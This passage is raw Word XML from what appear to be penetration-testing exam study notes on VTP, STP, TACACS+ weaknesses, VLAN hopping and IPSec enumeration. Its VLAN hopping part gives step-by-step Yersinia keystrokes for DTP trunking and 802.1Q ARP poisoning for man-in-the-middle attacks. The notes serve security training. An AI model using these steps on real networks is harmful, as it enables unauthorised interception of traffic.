        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FE56C0" w:rsidRDefault="00FE56C0" w:rsidP="0099667B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE56C0">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>VTP may operate unauthenticated, in which case an attacker can easily inject spoofed VTP packets in order to add/delete VLAN information. Tools such as Yersinia are freely available to do that. A password can be set for the VTP domain: it is used in conjunction with the MD5 hash function to provide authentication of VTP packets. However, this optional password authentication should not conceal the fact that it is very risky to use VTP in sensitive environments.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00581D61" w:rsidRDefault="00581D61" w:rsidP="0099667B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FE56C0" w:rsidRPr="00152C43" w:rsidRDefault="00FE56C0" w:rsidP="00FE56C0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152C43">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Attack Tool:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE56C0" w:rsidRPr="00FE56C0" w:rsidRDefault="00FE56C0" w:rsidP="00FE56C0">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE56C0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>yersinia</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00B12BF6" w:rsidRDefault="00B12BF6" w:rsidP="00B12BF6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>STP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00363CBC" w:rsidRDefault="00363CBC" w:rsidP="00D51361">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099667B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The Spanning tree protocol (STP) is a link layer network protocol that ensures a loop-free topology for any bridged LAN. Thus, the basic function of STP is to prevent bridge loops and ensuing broadcast radiation.</w:t>
      </w:r>
      <w:r w:rsidR="00D51361" w:rsidRPr="0099667B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> STP uses the Spanning Tree Algorithm (STA), which senses that the switch has more than one way to communicate with a node, determines which way is best, and blocks out the other path(s). Each switch chooses which network paths it should use for each segment. This information is shared between all the switches by network frames called Bridge Protocol Data Units (BPDUs).</w:t>
      </w:r>
      <w:r w:rsidR="00152C43">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> There is no authentication in STP so spoofing is possible. Protection against spoofing is via ACLs or switch configurations such as bdpuguard and disabling STP on ports that don’t require it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51361" w:rsidRPr="0099667B" w:rsidRDefault="00D51361" w:rsidP="00D51361">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099667B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>A multi</w:t>
      </w:r>
      <w:r w:rsidR="00FE56C0">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="0099667B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>homed attacker on a participating STP area has the ability to fake a lower STP bridge priority than that of a current root bridge. If this occurs, an attacker can assume the root bridge function and affect active STP topology, thus redirecting all the network traffic through the attacker’s system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00363CBC" w:rsidRPr="0099667B" w:rsidRDefault="00363CBC" w:rsidP="00363CBC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0099667B" w:rsidRPr="0099667B" w:rsidRDefault="0099667B" w:rsidP="00363CBC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099667B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Disabling the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">STP </w:t>
      </w:r>
      <w:r w:rsidRPr="0099667B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">switch </w:t>
      </w:r>
      <w:r w:rsidRPr="0099667B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>will also result in a network DOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0099667B" w:rsidRPr="0099667B" w:rsidRDefault="0099667B" w:rsidP="0099667B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0099667B" w:rsidRPr="00152C43" w:rsidRDefault="00152C43" w:rsidP="0099667B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152C43">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack </w:t>
      </w:r>
      <w:r w:rsidR="0099667B" w:rsidRPr="00152C43">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Tool:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0099667B" w:rsidRPr="00FE56C0" w:rsidRDefault="0099667B" w:rsidP="0099667B">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE56C0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>yersinia</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00B12BF6" w:rsidRDefault="00B12BF6" w:rsidP="00B12BF6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>TACACS+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B12BF6" w:rsidRPr="007054E3" w:rsidRDefault="001E0A2E" w:rsidP="006E38B0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007054E3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TACACS+ (Terminal Access Controller Access-Control System Plus) is a Cisco proprietary protocol which provides access control for routers, network access servers and other networked computing devices via one or more centralized servers. TACACS+ provides separate authentication, authorization and accounting services.</w:t>
      </w:r>
      <w:r w:rsidR="00EA1CD4" w:rsidRPr="007054E3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> TACACS</w:t>
      </w:r>
      <w:r w:rsidR="000C60CC" w:rsidRPr="007054E3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidR="00EA1CD4" w:rsidRPr="007054E3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> uses TCP port 49. The packet body </w:t>
      </w:r>
      <w:r w:rsidR="007054E3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">is encrypted but the header is </w:t>
      </w:r>
      <w:r w:rsidR="00EA1CD4" w:rsidRPr="007054E3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>not.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B12BF6" w:rsidRPr="007054E3" w:rsidRDefault="00B12BF6" w:rsidP="006E38B0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000C60CC" w:rsidRPr="007054E3" w:rsidRDefault="000C60CC" w:rsidP="006E38B0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007054E3">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Issues:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA1CD4" w:rsidRPr="007054E3" w:rsidRDefault="00EA1CD4" w:rsidP="007054E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="96"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007054E3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Lack of integrity checking so accounting records can be altered while in transmission. </w:t>
      </w:r>
      <w:r w:rsidR="007054E3" w:rsidRPr="007054E3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">As an </w:t>
      </w:r>
      <w:r w:rsidRPr="007054E3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MD5-based stream cipher used to encrypt TACACS+</w:t>
      </w:r>
      <w:r w:rsidR="007054E3" w:rsidRPr="007054E3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007054E3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>packets, an attacker with access to the wire flip most of</w:t>
      </w:r>
      <w:r w:rsidR="007054E3" w:rsidRPr="007054E3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007054E3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>the bits in the packet (which affects the plaintext in the same way)</w:t>
      </w:r>
      <w:r w:rsidR="007054E3" w:rsidRPr="007054E3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007054E3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>without the change getting detected.  In particular, it is possible</w:t>
      </w:r>
      <w:r w:rsidR="007054E3" w:rsidRPr="007054E3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007054E3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to make meaningful changes to accounting packets, such as modifying</w:t>
      </w:r>
      <w:r w:rsidR="007054E3" w:rsidRPr="007054E3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007054E3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>an elapsed_time from 9000 to 1000 with the flip of one bit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007054E3" w:rsidRPr="007054E3" w:rsidRDefault="007054E3" w:rsidP="007054E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="96"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007054E3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Vulnerability to replay attacks so duplicate accounting records can be produced, possibly with forged task_id fields to avoid detection. Since all TACACS+ sessions start with a sequence number of 1, the TACACS+ server will always process a packet with seq_no set to 1.  Accounting sessions, which consist of only one packet sent to the server (with a seq_no of 1) so it is easy to replay these packet.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007054E3" w:rsidRPr="007054E3" w:rsidRDefault="007054E3" w:rsidP="007054E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="96"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007054E3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>It is possible to force session_id collisions so the encryption of reply packets can be compromised. Due to its use of a stream cipher, the strength of TACACS+ encryption depends heavily on unique session_id's for each session.  If two different packets happen to get the same session_id and the same seq_no, they both become vulnerable to simple frequency analysis attacks.  Additionally, if there's known plaintext in one of the packets, the corresponding parts of the other can trivially be decrypted. It is possible to get the TACACS+ server to encrypt a reply packet using a session_id of our choice.  Combined with our ability to replay packets sent to a TACACS+ server, this lets us compromise the encryption of most of the packets on the way back.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007054E3" w:rsidRPr="007054E3" w:rsidRDefault="007054E3" w:rsidP="007054E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="96"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007054E3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Lack of padding in the encryption so the lengths of user passwords can be determined. The lengths of variable size data fields can often be determined from the packet sizes – an attacker only needs a way to find out which packets contain the information they are looking for.  This task is simplified by the fact that sequence numbers and packet types are transmitted in the clear. In the case of determining password lengths, the corresponding usernames can be obtained via finger to the NAS or similar approaches.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007054E3" w:rsidRDefault="007054E3" w:rsidP="006E38B0"/>
    <w:p w:rsidR="00B12BF6" w:rsidRDefault="00B12BF6" w:rsidP="006E38B0"/>
    <w:p w:rsidR="006E38B0" w:rsidRDefault="00581D61" w:rsidP="006E38B0">
      <w:r>
        <w:t>--</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b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC756F">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">VLAN </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC756F">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Hopping  (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC756F">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">not in CREST syllabus)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VLAN Hopping is an exploitation method used to attack a network with multiple VLANs. It is an attack that involves an attacking system to deploy packets. These packets have a destination of a system on a separate VLAN which would, in normal circumstances, not be accessible by the attacker. VLAN Hopping attacks are primarily conducted within the Dynamic Trunking Protocol (DTP). Often, VLAN Hopping attacks are directed at the trunking encapsulation protocol (802.1q or ISL).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Malicious traffic used for VLAN Hopping is tagged with a VLAN ID destined outside the VLAN on which the system conducting the attacks belongs to. An attacker can also attempt to behave and look like a switch, which will negotiate trunking, allowing the attacker to not only send, but receive traffic across more than one VLAN.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There are two common methods of VLAN Hopping; Switch Spoofing and Double Tagging.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Style w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC756F">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Switch Spoofing</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A Switch Spoofing attack is used to exploit the network by configuring a system to mimic a switch. This is not always an easy attack to perform, as it requires the attacker to be able to emulate itself as ISL or 802.1q, thus signaling with Dynamic Trunk Protocol signaling. This attack method allows a malicious user to mimic a machine as a switch with a trunking port. If the attack is successful, it then has a membership across all VLANs.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Style w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="94"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC756F">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Double Tagging</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Double Tagging is an attack which postulates that the attacker tags transmitted frames, with split headers, both of which as 802.1q headers. This will allow the frames to be forwarded into the wrong VLAN. Double Tagging works because the first switch that the frames reach strips the first of the two 802.1q headers, and then forwards the frame with the second header destined for the victim VLAN. The conclusion of the stripped first 802.1q header is that the frame is forwarded with the inner header, out of all switch ports, and trunk ports that are configured with the native VLAN where the attacker resides. The secondary switch will then forward the stripped frame to the second VLAN identifier, thus VLAN Hopping occurs.</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Yersinia is a GNU/Linux framework that takes advantage of some of the weaknesses in different network protocols. It can be used for analyzing and testing deployed networks and systems. To use Yersinia for a VLAN Hopping attack, the following steps may be followed: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1. </w:t>
      </w:r>
      <w:r w:rsidR="00581D61" w:rsidRPr="00DC756F">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Start Yersinia via the command line by typing: yersinia -I.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2. </w:t>
      </w:r>
      <w:r w:rsidR="00581D61" w:rsidRPr="00DC756F">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Select a NIC you wish to use by pressing “i”.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3. </w:t>
      </w:r>
      <w:r w:rsidR="00581D61" w:rsidRPr="00DC756F">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Set Yersinia to trunking mode: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a. </w:t>
      </w:r>
      <w:r w:rsidR="00581D61" w:rsidRPr="00DC756F">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Load DTP mode by pressing the “g” key, then select DTP mode.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b. </w:t>
      </w:r>
      <w:r w:rsidR="00581D61" w:rsidRPr="00DC756F">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Press the “x” button to open the attacks menu.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c. </w:t>
      </w:r>
      <w:r w:rsidR="00581D61" w:rsidRPr="00DC756F">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Press “1” to enable trunking mode.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4. </w:t>
      </w:r>
      <w:r w:rsidR="00581D61" w:rsidRPr="00DC756F">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Set Yersinia to 802.1q mode by pressing the “g” key and selecting 802.1Q mode.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5. </w:t>
      </w:r>
      <w:r w:rsidR="00581D61" w:rsidRPr="00DC756F">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The following needs to be obtained via reconnaissance for this attack to work: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a. </w:t>
      </w:r>
      <w:r w:rsidR="00581D61" w:rsidRPr="00DC756F">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Victim's VLAN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b. </w:t>
      </w:r>
      <w:r w:rsidR="00581D61" w:rsidRPr="00DC756F">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Victim's gateway IP Address.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c. </w:t>
      </w:r>
      <w:r w:rsidR="00581D61" w:rsidRPr="00DC756F">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A host in the victim's network segment that is not alive.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The following will perform an ARP Poisoning attack to assist in man-in-the-middle attacks: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1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC756F">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00581D61" w:rsidRPr="00DC756F">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Press 'd'</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00581D61" w:rsidRPr="00DC756F">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> to initialize default values, and then press 'x' to open the attack panel.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2.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC756F">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00581D61" w:rsidRPr="00DC756F">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Select 2; “sending 802.1Q arp poisoning” </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E38B0" w:rsidRPr="0082714B" w:rsidRDefault="00DC756F" w:rsidP="0082714B">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3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC756F">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00581D61" w:rsidRPr="00DC756F">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Fill in the information gathered by reconnaissance in step 5. The attack will take place.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B12BF6" w:rsidRDefault="00B12BF6" w:rsidP="00DC756F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="center" w:pos="4513"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>D4 – IPSec</w:t>
      </w:r>
      <w:r w:rsidR="00DC756F">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B50C46" w:rsidRDefault="00B12BF6" w:rsidP="00B12BF6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">D4a - </w:t>
      </w:r>
      <w:r w:rsidRPr="00B12BF6">
        <w:t>Enumeration and fingerprinting of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> devices running IPSec services</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C0136" w:rsidRPr="00962FA1" w:rsidRDefault="009C0136" w:rsidP="009C0136">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00962FA1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Association and key Management Protocol (ISAKMP) </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00962FA1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00962FA1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> accessible through UDP port 500, and provides Internet Key Exchange (IKE) support for IPsec VPN tunnels. IKE is used as the authentication mechanism when establishing an IPsec connection; it supports three authentication methods: pre-shared keys, public key encryption, or digital signatures. IKE is split into two phases, each of which has its own distinct purpose. IKE Phase 1 IKE Phase 1’s main purpose is to authenticate the two communicating parties with each other and then set up a secure channel for IKE Phase 2. This can be done in one of two ways: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C0136" w:rsidRPr="00962FA1" w:rsidRDefault="009C0136" w:rsidP="009C0136">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="94"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00962FA1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Main mode - In three two-way handshakes (a total of 6 messages), Main mode authenticates both parties to each other. This process first establishes a secure channel in which authentication information is then exchanged securely between the two parties.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C0136" w:rsidRPr="00962FA1" w:rsidRDefault="009C0136" w:rsidP="009C0136">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
